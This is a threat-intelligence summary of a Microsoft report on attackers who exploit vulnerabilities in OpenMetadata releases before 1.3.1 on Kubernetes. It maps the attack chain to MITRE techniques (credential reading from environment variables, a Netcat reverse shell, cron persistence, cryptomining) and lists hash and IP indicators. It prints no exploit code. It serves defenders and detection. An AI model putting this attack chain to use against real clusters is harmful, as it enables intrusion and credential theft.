Threat Research

Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters | Microsoft Security Blog

Securonix

Microsoft Threat Intelligence reports attackers exploiting critical OpenMetadata vulnerabilities to gain code execution in Kubernetes workloads and deploy cryptomining malware. They target OpenMetadata versions prior to 1.3.1, leverage environment data for movement, establish a reverse shell, and persist with cron jobs, with Defender for Containers helping detect the activity.
#OpenMetadata #Interactsh #Netcat #Kubernetes #Cron #Cryptomining #MicrosoftDefenderForContainers

Keypoints

  • Attackers exploited new OpenMetadata CVEs to gain code execution on vulnerable Kubernetes workloads.
  • Initial access focuses on OpenMetadata instances exposed to the internet with vulnerable images (pre-1.3.1).
  • Attackers use Interactsh-related OAST domains to validate connectivity after intrusion.
  • Reconnaissance includes gathering OS, hardware, network configuration, and active users.
  • Environment variables may reveal service credentials and connection strings for lateral movement.
  • Cryptomining malware is downloaded and executed; initial payloads are removed; a reverse shell via Netcat is used for hands-on control; cronjobs provide persistence.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Gain code execution on the vulnerable OpenMetadata container by exploiting CVEs. Quote: “to gain code execution on the container running the vulnerable OpenMetadata image.”
  • [T1082] System Information Discovery – Gather OS version, hardware configuration, and active users. Quote: “query information on the network and hardware configuration, OS version, active users, etc.”
  • [T1016] System Network Configuration Discovery – Gather information about network configuration as part of discovery. Quote: “query information on the network and hardware configuration, OS version, active users, etc.”
  • [T1552.004] Credentials in Environment Variables – Read environment variables that may contain connection strings and credentials. Quote: “read the environment variables of the workload. In the case of OpenMetadata, those variables might contain connection strings and credentials.”
  • [T1059] Command and Scripting Interpreter – Use Netcat to establish a reverse shell for hands-on-keyboard access. Quote: “initiate a reverse shell connection to their remote server using Netcat tool.”
  • [T1053] Scheduled Task/Job – Use cronjobs for persistence by scheduling malicious tasks. Quote: “for persistence, the attackers use cronjobs for task scheduling.”
  • [T1070] Indicator Removal on Host – Remove initial payloads from the workload to cover tracks. Quote: “remove the initial payloads from the workload.”

Indicators of Compromise

  • [IOC Type] Executable SHA-256 – 7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df, 19a63bd5d18f955c0de550f072534aa7a6a6cc6b78a24fea4cc6ce23011ea01d, 31cd1651752eae014c7ceaaf107f0bf8323b682ff5b24c683a683fdac7525bad
  • [IOC Type] IP – 8.222.144.60, 61.160.194.160, 8.130.115.208

Read more: https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/